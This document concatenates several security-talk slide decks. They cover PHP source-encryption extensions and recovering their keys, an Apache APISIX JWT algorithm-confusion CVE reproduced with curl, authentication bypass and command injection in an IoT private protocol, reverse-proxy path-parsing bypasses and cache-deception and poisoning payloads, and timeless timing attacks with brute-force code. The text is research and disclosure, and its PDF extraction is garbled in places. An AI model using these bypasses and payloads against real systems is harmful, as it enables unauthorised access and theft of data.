PHP_MINFO_FUNCTION(evalhook) { php_info_print_table_start(); php_info_print_table_row(2, "eval hooking", "enabled"); php_info_print_table_end(); } zend_function_entry evalhook_functions[] = { ZEND_FE_END }; zend_module_entry evalhook_module_entry = { STANDARD_MODULE_HEADER, "evalhook", evalhook_functions, PHP_MINIT(evalhook), PHP_MSHUTDOWN(evalhook), PHP_RINIT(evalhook), PHP_RSHUTDOWN(evalhook), PHP_MINFO(evalhook), "0.0.1-dev", STANDARD_MODULE_PROPERTIES }; ZEND_GET_MODULE(evalhook) 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 8 使⽤php扩展的代码混淆和⽆扩展代码混淆⽐较相似,只不过是把代码还原过程从php代码转到了php扩 展。 同样是使⽤aes des 异或等加密⽅法直接加密php代码,HOOK翻译php的函数在翻译PHP⽂件前对⽂件 进⾏解密操作。这种⽅案也可以完全还原出源代码。在⽆其他混淆和压缩时甚⾄还会保留注释。 典型开源项⽬:php-beast tonyenc screw-plus 这⾥以beast为例. ⾸先在php的扩展⽬录下找到beast.so beast的加密⽅案会把加密key编译进扩展中. 我们只需要寻找key就可以完成解密 beast由于是开源项⽬.有现成的符号表和源码这使得反编译寻找key变得⾮常简单. 但这样有点太简单了. 所以这⾥演示的是在没有源码的情况下使⽤IDA分析解密流程. ⾸先在导⼊表找到zend_compile_file 这个函数会将php⽂件翻译成opcode 因此⼤部分php加密扩展都需要hook这个函数达到拦截php⽂件载⼊和替换php⽂件的功能 源代码混淆 ⼿⼯解密 9 继续跟⼊ 发现有两个函数 ⼀般在这种php加密扩展设计时会对这个函数有两次操作: ⼀个是在启动时hook 这个函数,⼀个是在停⽌时恢复这个函数。 继续跟⼊启动hook 显然⽂件处理逻辑在cgi_compile_file内 10 跟踪⽂件句柄 decrypt_file函数的参数存在⽂件句柄 所以这个函数应该就是⽂件解密函数 根据代码可以看出beast 加密⽂件的结构 | encrypt_file_header_sign ⽂件头标记(不固定 可修改)| reallen⽂件⻓度 int 4字节 | expire 到期时 间 int 4字节| entype 加密⽅式 int 4字节| 加密后⽂件| 11 分析⽂件头发现该⽂件加密⽅式为 02 跟⼊beast_get_encrypt_algo 2对应的是 aes_handler_ops 12 使⽤了AES 128 ECB加密模式 直接提取key参数内容 ⻓度刚好16位 到这⼀步就成功拿到了加密秘钥 使⽤拿到的KEY就可以解密PHP⽂件 ⾃动化通⽤解密 13 编写php扩展 HOOK zend_compile_file函数 beast的加密不会对php⽂件做额外的操作 解密⽂件与加密前原⽂件完全⼀致 php注释和原格式都会保留 注意: 这⾥扩展加载顺序问题 建议直接修改php源码 Zendzend_language_scanner.c ZEND_API zend_op_array *compile_file php会将源代码翻译成类似汇编的⼆进制中间操作码再交给zend引擎执⾏。 之前的介绍的都是编译之前对php源代码的直接操作。这⾥是对opcode的操作,跳过翻译过程,直接把 现成的opcode交给zend引擎执⾏(不同版本PHP引擎编译出的opcode可能会有兼容性问题)。 这种php代码防护⽅法 只能hook zend_execute 拿到opcode。 不可能直接得到原本的源码,只能通过 反编译尽可能的还原源代码。 ⼤部分商业php保护⽅案都使⽤这种可靠的⽅案为基础 ZendGuard(zend) SourceGuardian(SG) IonCube (IC) Swoole Compiler 上⾯的⽅案有的还对zend引擎进⾏了魔改,使翻译出的opcode只能在修改后的引擎执⾏,进⼀步增强了 安全性。 hook zend_execute 拿到opcode 使⽤对应版本的php操作码反推php代码 太菜了不会反编译) opcode 还原代码 附录 14 phpize ⽣成Makefile 配置编译选项 启⽤扩展 最后执⾏make 编译扩展 编译好的扩展会放在./modules/ ⽬录下 使⽤扩展 可以重复使⽤-d extension 加载多个扩展 PHP扩展编译 Bash 复制代码 docker run -it --rm -v /mnt/hgfs/tmpssd/php-eval-hook/:/ext/ php:5.6 /bin/bash apt-get update apt install libtool 1 2 3 Bash 复制代码 phpize 1 Bash 复制代码 ./configure --enable-evalhook 1 C 复制代码 php -d extension=扩展位置 -f ⽂件 1 15 在选⽤PHP源码保护⽅案时 尽量选择opcode或虚拟机⽅案 源代码混淆类只能对源代码获取和阅读增加⼀点困难 在加密扩展可被攻击者获取到时并不能起到保护作 ⽤ PHP代码审计⼊⻔指南 php内核剖析 从Zend虚拟机分析PHP加密扩展 通⽤加密php⽂件还原⽅法 总结 参考
pdf
APISIX_CVE-2022-29266 Patch https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 jwt jwt-auth consumer JWT Authentication service route consumer cookie jwt-auth HS256 RS256 jwt:load_jwt(token) https://github.com/SkyLothar/lua-resty-jwt/blob/ee1d024071f872e2b5a66eaaf9aeaf86c5bab3ed/lib/resty/jwt.lua#L782 jwt_obj[str_const.reason] = "Decode secret is not a valid cert/public key: " .. (err and err or secret) HS256jwt-authRS256tokenHS256secretkeytoken Payload vulhub https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 openssl genrsa -out private.key openssl rsa -in private.key -pubout -outform PEM -out public.pem consumer jwt-auth RS256 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "user-key", "public_key": "-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----", "private_key": "-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----", "algorithm": "RS256" } } }' Route Service jwt-auth curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' RS256Token curl http://127.0.0.1:9080/apisix/plugin/jwt/sign?key=user-key -i consumer jwt-auth HS256 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "user-key", "secret": "my-secret-key" } } }' Route Service jwt-auth curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' RS256tokenHS256HS256secret key curl http://127.0.0.1:9080/index.html?jwt=eyJ4NWMiOlsiLS... -i keyToken https://github.com/apache/apisix/blob/96838b9b47347429d79ba5cc10c3267b8c62bee9/docs/zh/latest/plugins/jwt-auth.md https://www.bookstack.cn/read/apache-apisix-1.4.1-zh/9ec65217dcf67be9.md https://github.com/apache/apisix/blob/master/apisix/plugins/jwt-auth.lua https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 https://github.com/SkyLothar/lua-resty-jwt/blob/ee1d024071f872e2b5a66eaaf9aeaf86c5bab3ed/lib/resty/jwt.lua#L782
pdf
从 后 门 到 漏 洞 — — 智 能 设 备 私 有 协 议 中 的 安 全 问 题 魏凡 绿盟科技 格物实验室 安全研究员 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 智能设备中的私有协议 私有协议一般来说指未文档化的协议,格式未知,一般具有以下特点: ⚫ 从功能上来讲,一般用于运维管理/服务发现等功能 ⚫ 一般监听于TCP/UDP的大端口 ⚫ 多数作为服务端,部分可以在厂商官网找到协议的客户端 私有协议的格式未知,所以逆向分析较难,因此公开的漏洞较少,但一出现安全问题,一般 影响都较为严重。 私有协议的安全问题 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结 目录 header 魔数 版本号 操作码 长度域 校验和 … body 长度域 数据部分 … 可能存在header+body的嵌套 私有协议的一般格式 协议“入口点”(网络通信函数): recv/send,recvfrom/sendto, recvmsg/sendmsg 协议分析——“入口点” 还有一些容易忽略的地方: ⚫ 有些采用ssl连接,ssl_read/ssl_write ⚫ recv也可用于接收udp的数据包,recvfrom也可用于接收tcp数据包 ⚫ 有时候通信函数在应用的调用库中 调试与调试权限获取 获取调试权限的一般思路: ⚫ 利用设备自带的TELNET/SSH功能 ⚫ 利用设备硬件调试接口 ⚫ 修改设备固件增加调试后门 ⚫ 利用设备的已知漏洞 ⚫ 利用设备的未知漏洞 准备静态编译的小工具,比较常用的有 busybox, gdbserver和tcpdump “拿到设备的调试权限,整个漏洞挖掘工作就成功了一半” ——来自某不知名研究员 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 本议题所提到的漏洞均已送报厂商并已修复 一个偶然的机会,我们拿到了一个某厂商生产的智能设备,其某个TCP端口使用了一个私 有协议,该协议未文档化,官网也未提供任何管理客户端。 ⚫ CyaSSL_read ⚫ 单向认证 某厂商智能设备私有协议分析 ⚫ 找到协议“入口点” ⚫ 跟踪数据流向 ⚫ 逆向分析 常规漏洞挖掘思路 主观考虑智能设备的常见协议:UPNP协议——接口的命令注入 MQTT协议——未授权访问 非常规的私有协议漏洞挖掘思路 协议“脆弱点”——容易出现漏洞的地方 非常规思路:以发现漏洞为导向,暂时不考虑格式,先了解其功能,然后对其“脆弱点”进 行重点突破。 协议提供的功能 reboot restorefactory 协议认证逻辑 取某个全局变量作为初始字符串,将该字符串进过三次处理,最后和用户传入的一个串进行比较。 第一次处理,和两个特殊字符 串进行移位混淆;后续两次处理都 是标准md5运算。 通过md5算法中的4个链接变量来识别 协议认证逻辑分析 假设作为初始字符串的全局变量为“admin”,将利用如下算法进行处理: (1)取“admin”字符串,和两个固定字符串一起参与移位混淆操作,得到新字符串; (2)将第一次变换得到的新字符串进行标准md5运算,得到hash值 “\x21\x23\x2f\x29\x7a\x57\xa5\xa7\x43\x89\x4a\x0e\x4a\x80\x1f\xc3”; (3)将第二次得到的hash值再次进行标准md5运算,得到hash值 “\x43\x44\x26\x76\xc7\x4a\xe5\x9f\x21\x9c\x2d\x87\xfd\x6b\xad\x52” 将最后得到的hash值与用户传入进行比较,若相等则认证成功。 在调用认证函数之前,有个函数将会给该全局变量赋值。 是有趣的是,这里将固定字符串“admin”拷贝到全局变量处。 初始字符串的赋值 运维“后门” 传入固定字符串“admin”经过三次变换后的凭证 “\x43\x44\x26\x76\xc7\x4a\xe5\x9f\x21\x9c\x2d\x87\xfd\x6b\xad\x52” 即可完成认证过程,控制设备重启/恢复出厂设置。 用户:我忘了设备的管理密码了,怎么办? 厂商:IP告诉我一下,我给你远程重置一下。 用户:666啊! 协议的专利 功能: ⚫ 修改配置 ⚫ 重启 ⚫ 恢复出厂设置 ⚫ 固件更新 专利所有权厂商的第一类设备 从配置文件中读取web管理员密码作为原始字符串。 初始字符串的获取 md5_digest(output, input, len) 运算长度len不能为0,如果为0,直接返回 ⚫ 传入md5_digest函数的长度参数为用户控制,可设置为0 ⚫ 没有验证md5_digest函数的返回值,直接将结果用于memcmp进行比较 ⚫ 参与memcmp的第一个参数被初始化为空 ⚫ 控制长度参数为0+凭据为空值(16个\x00)的请求包,即可绕过认证 认证绕过 固件更新处的命令注入,tftp命令中的“文件名”参数为用户传入: 结合前面的认证绕过,达到未授权执行任意命令。 未授权RCE ⚫ 功能上和第一类设备类似 ⚫ UCI读取WEB管理员密码作为初始字符串 专利所有权厂商的第二类设备 ⚫ 传入的长度为用户控制,可以为0 ⚫ md5_digest算法中未验证传入的长度参数 ⚫ 对于标准md5算法来说,当传入md5_update函数的长度参数为0时,无论传入的原始字符串为 何值,生成的hash永远为固定的串“d41d8cd98f00b204e9800998ecf8427e” 认证绕过 还是按照之前的认证算法进行运算,第二次参与md5运算的长度可控。 专利所有权厂商的第三类设备 在md5_digest函数中,对参与md5运算的长度做了判断,不能为0 md5_digest函数对长度的限制 ⚫ 考虑把参与md5_digest运算的长度设为1,则只有一个字节参与md5运算; ⚫ 参与运算的值为0x00-0xff,生成的hash值也有256种情况; ⚫ 协议并未限制最大尝试次数,可无限次发送认证请求。 认证逻辑绕过 生成“密码”字典 构造数据包 发送到设备端 根据返回值判断是否认证成功 实现任意控制设备 控制长度为1 遍历256个md5 hash 认证绕过实现 同一厂商生产的不同类型的设备,针对私有协议的实现上,往往会出现相似的“脆弱点”。 小结 md5_digest函数: ⚫ 不验证返回值 ⚫ 不验证传入长度 ⚫ 验证了,好像又没有验证 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 总结与建议 总结——警惕私有协议“供应链”漏洞 后续的研究中,我们发现存在其他厂商也在使用该协议,和传统的出现在SDK上的供应链漏洞相 比,这些漏洞更加“隐蔽”和难以修复。 给厂商和开发人员的建议——协议设计和实现上尽量用白名单的思想。 谢 谢
pdf
Reverse proxies & Inconsistency Aleksei "GreenDog" Tiurin About me • Web security fun • Security researcher at Acunetix • Pentester • Co-organizer Defcon Russia 7812 • @antyurin "Reverse proxy" - Reverse proxy - Load balancer - Cache proxy - … - Back-end/Origin "Reverse proxy" URL http://www.site.com/long/path/here.php?query=111#fragment http://www.site.com/long/path;a=1?query=111#fragment + path parameters Parsing GET /long/path/here.php?query=111 HTTP/1.1 GET /long/path/here.php?query=111#fragment HTTP/1.1 GET anything_here HTTP/1.1 GET /index.php[0x..] HTTP/1.1 URL encoding % + two hexadecimal digits a -> %61 A -> %41 . -> %2e / -> %2f Path normalization /long/../path/here -> /path/here /long/./path/here -> /long/path/here /long//path/here -> /long//path/here -> /long/path/here /long/path/here/.. -> /long/path/ -> /long/path/here/.. Inconsistency - web server - language - framework - reverse proxy - … - + various configurations /images/1.jpg/..//../2.jpg -> /2.jpg (Nginx) -> /images/2.jpg (Apache) Reverse proxy - apply rule after preprocessing? /path1/ == /Path1/ == /p%61th1/ - send processed request or initial? /p%61th1/ -> /path1/ Reverse proxy Request - Route to endpoint /app/ - Rewrite path/query - Deny access - Headers modification - ... Response - Cache - Headers modification - Body modification - ... Location(path)-based Server side attacks We can send it: GET //test/../%2e%2e%2f<>.JpG?a1=”&?z#/admin/ HTTP/1.1 Host: victim.com Client side attacks <img src=”//test/../%2e%2e%2f<>.JpG?a1=”&?z#/admin/”> GET //..%2f%3C%3E.jpg?a1=%22&?z HTTP/1.1 Host: victim.com - Browser parses, decodes and normalizes. - Differences between browsers - Doesn’t normalize %2f (/..%2f -> /..%2f) - <> " ' - URL-encoded - Multiple ? in query Possible attacks Server-side attacks: - Bypassing restriction (403 for /app/) - Misrouting/Access to other places (/app/..;/another/path/) Client-side attacks: - Misusing features (cache) - Misusing headers modification Nginx - urldecodes/normalizes/applies - /path/.. -> / - doesn’t know path-params /path;/ - //// -> / - Location - case-sensitive - # treated as fragment Nginx as rev proxy. C1 - Configuration 1. With trailing slash location / { proxy_pass http://origin_server/; } - resends control characters and >0x80 as is - resends processed - URL-encodes path again - doesn’t encode ' " <> XSS? - Browser sends: http://victim.com/path/%3C%22xss_here%22%3E/ - Nginx (reverse proxy) sends to Origin server: http://victim.com/path/<”xss_here”>/ Nginx as rev proxy. C2 - Configuration 2. Without trailing slash location / { proxy_pass http://origin_server; } - urldecodes/normalizes/applies, - but sends unprocessed path Nginx + Weblogic - # is an ordinary symbol for Weblogic Block URL: location /Login.jsp GET /#/../Login.jsp HTTP/1.1 Nginx: / (after parsing), but sends /#/../Login.jsp Weblogic: /Login.jsp (after normalization) Nginx + Weblogic - Weblogic knows about path-parameters (;) - there is no path after (;) (unlike Tomcat’s /path;/../path2) location /to_app { proxy_pass http://weblogic; } /any_path;/../to_app Nginx:/to_app (normalization), but sends /any_path;/../to_app Weblogic: /any_path (after parsing) Nginx. Wrong config - Location is interpreted as a prefix match - Path after location concatenates with proxy_pass - Similar to alias trick location /to_app { proxy_pass http://server/app/; } /to_app../other_path Nginx: /to_app../ Origin: /app/../other_path Apache - urldecodes/normalizes/applies - doesn’t know path-params /path;/ - Location - case-sensitive - %, # - 400 - %2f - 404 (AllowEncodedSlashes Off) - ///path/ -> /path/, but /path1//../path2 -> /path1/path2 - /path/.. -> / - resends processed Apache as rev proxy. C1 - Configurations: ProxyPass /path/ http://origin_server/ <Location /path/> ProxyPass http://origin_server/ </Location> - resends processed - urlencodes path again - doesn’t encode ' Apache and // - <Location "/path"> and ProxyPass /path includes: - /path, /path/, /path/anything - //path////anything Apache and rewrite RewriteCond %{REQUEST_URI} ^/protected/area [NC] RewriteRule ^.*$ - [F,L] No access? Bypasses: /aaa/..//protected/area -> //protected/area /protected//./area -> /protected//area /Protected/Area -> /Protected/Area The same for <LocationMatch "^/protected/"> Apache and rewrite RewriteEngine On RewriteRule /lala/(path) http://origin_server/$1 [P,L] - resends processed - something is broken - %3f -> ? - /%2e%2e -> /.. (without normalization) Apache and rewrite RewriteEngine On RewriteCond "%{REQUEST_URI}" ".*\.gif$" RewriteRule "/(.*)" "http://origin/$1" [P,L] Proxy only gif? /admin.php%3F.gif Apache: /admin.php%3F.gif After Apache: /admin.php?.gif Nginx + Apache location /protected/ { deny all; return 403; } + proxy_pass http://apache (no trailing slash) /protected//../ Nginx: / Apache: /protected/ Varnish - no preprocessing (parsing, urldecoding, normalization) - resends unprocessed request - allows weird stuff: GET !i<@>?lala=#anything HTTP/1.1 - req.url is unparsed path+query - case-sensitive Varnish Misrouting: if (req.http.host == "sport.example.com") { set req.http.host = "example.com"; set req.url = "/sport" + req.url; } Bypass: GET /../admin/ HTTP/1.1 Host: sport.example.com Varnish if(req.method == "POST" || req.url ~ "^/wp-login.php" || req.url ~ "^/wp-admin") { return(synth(503)); } No access?? PoST /wp-login%2ephp HTTP/1.1 Apache+PHP: PoST == POST Haproxy/nuster - no preprocessing (parsing, urldecoding, normalization) - resends unprocessed request - allows weird stuff: GET !i<@>?lala=#anything HTTP/1.1 - path_* is path (everything before ? ) - case-sensitive Haproxy/nuster acl restricted_page path_beg /admin block if restricted_page !network_allowed path_beg includes /admin* No access? Bypasses: /%61dmin Haproxy/nuster acl restricted_page path_beg,url_dec /admin block if restricted_page !network_allowed url_dec urldecodes path No access? url_dec sploils path_beg path_beg includes only /admin Bypass: /admin/ Varnish or Haproxy Host check bypass: if (req.http.host == "safe.example.com" ) { set req.backend_hint = foo; } Only "safe.example.com" value? Bypass using (malformed) Absolute-URI: GET httpcococo://unsafe-value/path/ HTTP/1.1 Host: safe.example.com Varnish GET httpcoco://unsafe-value/path/ HTTP/1.1 Host: safe.example.com Varnish: safe.example.com, resends whole request Web-server(Nginx, Apache, …): unsafe-value - Most web-server supports and parses Absolute-URI - Absolute-URI has higher priority that Host header - Varnish understands only http:// as Absolute-URI - Any text in scheme (Nginx, Apache) tratata://unsafe-value/ Client Side attacks If proxy changes response/uses features for specific paths, an attacker can misuse it due to inconsistency of parsing of web-server and reverse proxy server. Misusing headers modification location /iframe_safe/ { proxy_pass http://origin/iframe_safe/; proxy_hide_header "X-Frame-Options"; } location / { proxy_pass http://origin/; } - only /iframe_safe/ path is allowed to be framed - Tomcat sets X-Frame-Options deny automatically Misusing headers modification Nginx + Tomcat: <iframe src=”http://victim/iframe_safe/..;/any_other_path”> Browser: http://victim/iframe_safe/..;/any_other_path Nginx: http://victim/iframe_safe/..;/any_other_path Tomat: http://victim/any_other_path Misusing headers modification location /api_cors/ { proxy_pass http://origin; if ($request_method ~* "(OPTIONS|GET|POST)") { add_header Access-Control-Allow-Origin $http_origin; add_header "Access-Control-Allow-Credentials" "true"; add_header "Access-Control-Allow-Methods" "GET, POST"; } - Quite insecure, but - if http://origin/api_cors/ requires token for interaction Misusing headers modification Attacker’s site: fetch("http://victim.com/api_cors%2f%2e%2e"... fetch("http://victim.com/any_path;/../api_cors/"... fetch("http://victim.com/api_cors/..;/any_path"... ... Nginx: /api_cors/ Origin: something else (depending on implementation) Caching - Who is caching? browsers, proxy... - Cache-Control in response (Expires) - controls what and where and for how long a response can be cached - frameworks sets automatically (but not always!) - public, private, no-cache (no-store) - max-age, ... - Cache-Control: no-cache, no-store, must-revalidate - Cache-Control: public, max-age=31536000 - Cache-Control in request - Nobody cares? :) Implementation - Only GET - Key: Host header + unprocessed path/query - Nginx: Cache-Control, Set-Cookie - Varnish: No Cookies, Cache-Control, Set-Cookie - Nuster(Haproxy): everything? - CloudFlare: Cache-Control, Set-Cookie, extension-based(before ?) - /path/index.php/.jpeg - OK - /path/index.jsp;.jpeg - OK Aggressive caching - When Cache-Control check is turned off - *or CC is set incorrectly by web application (custom session?) Misusing cache - Web cache deception - https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cac he-Deception-Attack.pdf - Force a reverse proxy to cache a victim’s response from origin server - Steal user’s info - Cache poisoning - https://portswigger.net/blog/practical-web-cache-poisoning - Force a reverse proxy to cache attacker’s response with malicious data, which the attacker then can use on other users - XSS other users Misusing cache - What if Aggressive cache is set for specific path /images/? - Web cache deception - Cache poisoning with session Path-based Web cache deception location /images { proxy_cache my_cache; proxy_pass http://origin; proxy_cache_valid 200 302 60m; proxy_ignore_headers Cache-Control Expires; } Web cache deception: - Victim: <img src=”http://victim.com/images/..;/index.jsp”> - Attacker: GET /images/..;/index.jsp HTTP/1.1 Cache poisoning with session nuster cache on nuster rule img ttl 1d if { path_beg /img/ } Cache poisoning with session: - Web app has a self-XSS in /account/attacker/ - Attacker sends /img/..%2faccount/attacker/ - Nuster caches response with XSS - Victims opens /img/..%2faccount/attacker/ and gets XSS Varnish sub vcl_recv { if (req.url ~ "\.(gif|jpg|jpeg|swf|css|js)(\?.*|)$") { set req.http.Cookie-Backup = req.http.Cookie; unset req.http.Cookie; } sub vcl_hash { if (req.http.Cookie-Backup) { set req.http.Cookie = req.http.Cookie-Backup; unset req.http.Cookie-Backup; } Varnish sub vcl_backend_response { if (bereq.url ~ "\.(gif|jpg|jpeg|swf|css|js)(\?.*)$") { set beresp.ttl = 5d; unset beresp.http.Cache-Control; } Varnish if (bereq.url ~ "\.(gif|jpg|jpeg|swf|css|js)(\?.*)$") { Web cache deception: <img src=”http://victim.com/admin.php?q=1&.jpeg?xxx”> Cache poisoning: - /account/attacker/?.jpeg?xxx - Known implementations - Headers: - CF-Cache-Status: HIT (MISS) - X-Cache-Status: HIT (MISS) - X-Cache: HIT (MISS) - Age: \d+ - X-Varnish: \d+ \d+ - Changing values in headers/body - Various behaviour for cached/passed (If-Range, If-Match, …) What is cached? Conclusion - Inconsistency between reverse proxies and web servers - Get more access/bypass restrictions - Misuse reverse proxies for client-side attacks - Everything is trickier in more complex systems - Checked implementations: https://github.com/GrrrDog/weird_proxies THANKS FOR ATTENTION @author @antyurin
pdf
Timeless Timing Attacks
 by Tom Van Goethem & Mathy Vanhoef Hello! Tom Van Goethem Researcher at DistriNet - 
 KU Leuven, Belgium Fanatic web & network
 security enthousiast Exploiter of side-channel attacks in browsers & the Web platform Mathy Vanhoef Postdoctoral Researcher at 
 NYU Abu Dhabi
 Soon: professor at KU Leuven Interested in Wi-Fi security, software security and applied crypto Discovered KRACK attacks against WPA2, RC4 NOMORE Timing attacks… if secret condition: do_something() # continue for el in arr: if check_secret_property(el): break if len(arr_with_secret_elements) > 0: do_something() Remote Timing Attacks • Step 1: attacker connects to target server • Step 2: attacker sends a (large) number of requests to the server • Step 3: for each request attacker measures time it takes to receive a response • Step 4: attacker compares timing of 2 sets of requests (baseline vs target) • Step 5: using statistical analysis, it is determined which request took longer • Step 6: SUCCESS? Remote Timing Attacks Success • Performance of timing attacks is influenced by different aspects: • Network connection between attacker and server • higher jitter → worse performance • attacker could try to move closer to target, e.g. same cloud provider • Jitter is present on both upstream and downstream path • Size of timing leak determines if attack can be successful • Timing difference of 50ms is easier to detect than 5µs • Number of measurements (more → better performance) Server Attacker Server Attacker Server Attacker 00:03:27 Server Attacker 00:03:27 Server Attacker 00:03:27 00:04:48 Server Attacker 00:03:27 00:04:48 ... Number of requests required to determine
 timing difference (5-50µs) with 95% accuracy based on measurements between university network and AWS
 imposed maximum: 100,000 EU US Asia 50µs 333 4,492 7,386 20µs 2,926 16,820 - 10µs 23,220 - - 5µs - - - Timeless Timing Attacks Timeless Timing Attacks • Absolute response timing is unreliable, as it will always include
 jitter for every request • Let’s get rid of the notion of time (hence timeless) • Instead of relying on sequential timing measurements, 
 we can exploit concurrency and only consider response order
 => no absolute timing measurements!! • Timeless timing attacks are unaffected by network jitter Server Attacker Server Attacker Server Attacker Server Attacker Server Attacker Timeless Timing Attacks:
 Requirements 1. Requests need to arrive at the same time at the server 2. Server needs to process requests concurrently 3. Response order needs to reflect difference in execution time Requirement #1: simultaneous arrival • Two options: multiplexing or encapsulation • Multiplexing: • Needs to be supported by the protocol (e.g. HTTP/2 and HTTP/3 enable
 multiplexing, HTTP/1.1 does not) • A single packet can carry multiple requests that will be processed
 concurrently • Encapsulation: • Another network protocol is responsible for encapsulating multiple streams
 (e.g. HTTP/1.1 over Tor or VPN) HEADERS GET /a HEADERS GET /b 1 TCP packet HTTP/2
 (multiplexing) HTTP/1.1 + Tor
 (encapsulation) GET /a GET /b TCP src: 45212 TCP src: 45214 Tor cell 1 Tor cell 2 1 TCP packet Requirement #2: concurrent execution • Application-dependent; most can be executed in parallel
 possible exception: crypto operations that rely on sequential operations Requirement #3: response order • Most operations will generate response immediately after processing • On TLS connections, response is decrypted in same order as it was
 encrypted on the server.
 TCP sequence numbers or (relative) TCP timestamps can also be used EU US Asia LAN localhost 50µs 333 4,492 7,386 20 14 20µs 2,926 16,820 - 41 16 10µs 23,220 - - 126 20 5µs - - - 498 42 Smallest diff 10µs 20µs 50µs 150ns 150ns Sequential Timing Attacks Timeless Timing Attacks (anywhere) 50µs 6 20µs 6 10µs 11 5µs 52 Smallest diff 100ns Internet How many requests/pairs are needed? Attack Scenarios 1. direct timing attack 2. cross-site timing attack 3. Wi-Fi authentication Cross-site Timing Attack • Victim user lands on malicious website (by clicking a link, malicious advertisement, urgent need to look at cute animal videos, …) • Attacker launches attack from JavaScript to trigger requests to targeted web server • Victim’s cookies are automatically included in request; request is processed using victim’s authentication • Attacker observes response order (e.g. via fetch.then()), and leaks sensitive information that victim shared with website • Real-world example: abuse search function on HackerOne to leak information about private reports Cross-site Timeless Timing Attack • Attacker has no low-level control over network; browser chooses how to send request to kernel • Need another technique to force 2 requests in single packet • TCP congestion control to the rescue!! • Congestion control prevents client from sending all packets at once
 needs ACK from server before sending more • When following requests are queued, they are merged in single packet 👍 fetch(target_bogus_url, { "mode": "no-cors", "credentials": "include", "method": "POST", "body": veryLongString }); fetch(target_baseline_url, { "mode": "no-cors", "credentials": "include" }); fetch(target_alt_url, { "mode": "no-cors", "credentials": "include" }); Victim’s TCP packet queue fetch(target_bogus_url, { "mode": "no-cors", "credentials": "include", "method": "POST", "body": veryLongString }); Victim’s TCP packet queue fetch(target_baseline_url, { "mode": "no-cors", "credentials": "include" }); Victim’s TCP packet queue fetch(target_alt_url, { "mode": "no-cors", "credentials": "include" }); Victim’s TCP packet queue Victim’s TCP packet queue Attack Scenarios 1. direct timing attack 2. cross-site timing attack 3. Wi-Fi authentication Exploiting Wi-Fi authentication
 (WPA2 w/ EAP-pwd) WPA2 & EAP-pwd • WPA2 is one of the most widely used Wi-Fi protocols • Authentication can be done using certificates (e.g. EAP-PEAP), or using passwords, relying on EAP-pwd • Authentication happens between client and authentication server 
 (e.g. FreeRADIUS), access point forwards messages • Communication between AP and authentication server is typically protected using TLS • EAP-pwd uses hash-to-curve to verify password • A timing leak was found! 😱 • “Fortunately” small timing difference, so considered not possible to exploit 😁 Access Point Client 1 Client 2 Client 3 FreeRADIUS Access Point Client 1 Client 2 Client 3 FreeRADIUS <associate> <associate> Access Point Client 1 Client 2 Client 3 FreeRADIUS EAP-id request EAP-id request Access Point Client 1 Client 2 Client 3 FreeRADIUS EAP-id response EAP-id response RadSec frames Access Point Client 1 Client 2 Client 3 FreeRADIUS PWD-id request PWD-id request RadSec frames Access Point Client 1 Client 2 Client 3 FreeRADIUS ReAuth request RadSec frames Access Point buffer Access Point Client 1 Client 2 Client 3 FreeRADIUS RadSec frames Access Point buffer PWD-id PWD-id Single A-MPDU frame Access Point Client 1 Client 2 Client 3 FreeRADIUS RadSec frames Access Point buffer Access Point Client 1 Client 2 Client 3 FreeRADIUS RadSec frames PWD-id request PWD-id request Bruteforcing Wi-Fi passwords • Timing side-channel in hash-to-curve method is exploited • Response order is enough information to perform bruteforce attack • Probability of incorrect order only 0.38% • Example RockYou password dump • 14M passwords • 40 measurements needed • ~86% success probability • Costs less than $1 to bruteforce password on cloud Overview 1. direct timing attack 2. cross-site timing attack 3. Wi-Fi authentication DEMO $documents = textSearch($query); if (count($documents) > 0) { $securityLevel = getSecurityLevel($user); // filter documents based on security level... } url_prefix = ‘https://vault.drud.us/search.php?q=DEFCON_PASSWORD=' r1 = H2Request('GET', url_prefix + char)
 # @ is not part of the charset so serves as baseline r2 = H2Request('GET', url_prefix + ‘@') async with H2Time(r1, r2, num_request_pairs=15) as h2t:
 results = await h2t.run_attack() num_negative = len([x for x in results if x < 0]) pct_reverse_order = num_negative / len(results) if pct_reverse_order > threshold: print('Found next character: %s' % char) attack.py Conclusion • Timeless timing attacks are not affected by network jitter at all • Perform remote timing attacks with an accuracy similar to an attack against
 the local system • Attacks can be launched against protocols that feature multiplexing
 or by leveraging a transport protocol that enables encapsulation • All protocols that meet the criteria can be susceptible to timeless
 timing attacks: we created practical attacks against HTTP/2 and EAP-pwd (Wi-Fi) Thank you! @tomvangoethem @vanhoefm https://github.com/DistriNet/timeless-timing-attacks Demo sources:
pdf
